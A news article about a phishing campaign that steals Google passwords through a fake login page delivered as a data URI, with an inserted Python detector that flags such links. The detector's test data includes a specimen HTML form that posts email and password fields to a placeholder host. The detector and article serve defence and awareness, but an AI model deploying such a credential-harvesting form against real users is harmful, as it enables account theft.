Hackers using advanced phishing attack to steal Google passwords

Open sesame: hackers phish for login credentials

Hackers are using a new and more sophisticated phishing technique to steal Google account passwords, according to anti-malware firm Bitdefender.

The attack begins with an email warning users that their account will be locked within 24 hours because they have used their entire storage quota, unless they click a link to increase their storage instantly.

Clicking the link redirects to a fake Google login page that mimics the real one but sends the entered credentials to the attackers instead.

The attack is difficult to catch with traditional heuristic detection. It is also difficult for users to notice, because the phishing page is delivered as a data URI: the page's own content is embedded in the browser address bar rather than loaded from a recognisable domain.

Google Chrome does not display the whole of this long address, making it the browser most exposed to this type of attack. However, Firefox is also affected.
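As an added example (not from Bitdefender or the article), the following Python shows how a mail gateway or log-triage script could flag links of this kind: it decodes data: URIs and reports those that carry an inline HTML form with a password field. The sample links, including the collector.example.invalid address, are constructed for the example.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample links as a gateway might extract them from an email body.
# The data: link wraps a tiny HTML page with a password field; it is a made-up
# specimen for exercising the detector, not the real campaign's page.
SAMPLE_LINKS = [
    "https://accounts.google.com/ServiceLogin",
    "data:text/html;base64," + base64.b64encode(
        b'<form action="https://collector.example.invalid/l" method="post">'
        b'<input name="Email"><input type="password" name="Passwd"></form>'
    ).decode(),
    "data:text/html,%3Cp%3Ehello%3C%2Fp%3E",
]

DATA_URI = re.compile(r"^data:(?P<mime>[^;,]*)(?P<params>(?:;[^,]*)*),(?P<body>.*)$", re.S | re.I)
PASSWORD_FIELD = re.compile(r"<input[^>]+type\s*=\s*[\"']?password", re.I)

def decode_data_uri(uri):
    """Return (mime, decoded text) for a data: URI, or None for any other URL."""
    m = DATA_URI.match(uri.strip())
    if m is None:
        return None
    body = m.group("body")
    if ";base64" in m.group("params").lower():
        body += "=" * (-len(body) % 4)  # browsers tolerate missing padding
        text = base64.b64decode(body).decode("utf-8", "replace")
    else:
        text = unquote(body)
    return (m.group("mime") or "text/plain"), text

def assess_link(uri):
    """'ok' for ordinary URLs, 'data-uri' for inline content, and
    'data-uri-credential-form' when that content is HTML with a password field:
    the login page lives in the address itself and posts the credentials elsewhere."""
    decoded = decode_data_uri(uri)
    if decoded is None:
        return "ok"
    mime, text = decoded
    if mime.lower().startswith("text/html") and PASSWORD_FIELD.search(text):
        return "data-uri-credential-form"
    return "data-uri"

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(f"{assess_link(link):26s} {link[:48]}")
```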

Gone fishing

Phishing attacks have been on the rise. A Kaspersky Labs report shows that a third of phishing attacks are designed to hijack personal details that can then be used to steal money.

"With access to users' Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents," said Catalin Cosoi, Chief Security Strategist at Bitdefender.

"The scam starts with an email allegedly sent by Google, with 'Mail Notice' or 'New Lockout Notice' as a subject."

The best defence is vigilance and common sense. Generally speaking, most genuine companies do not ask users to supply them with passwords.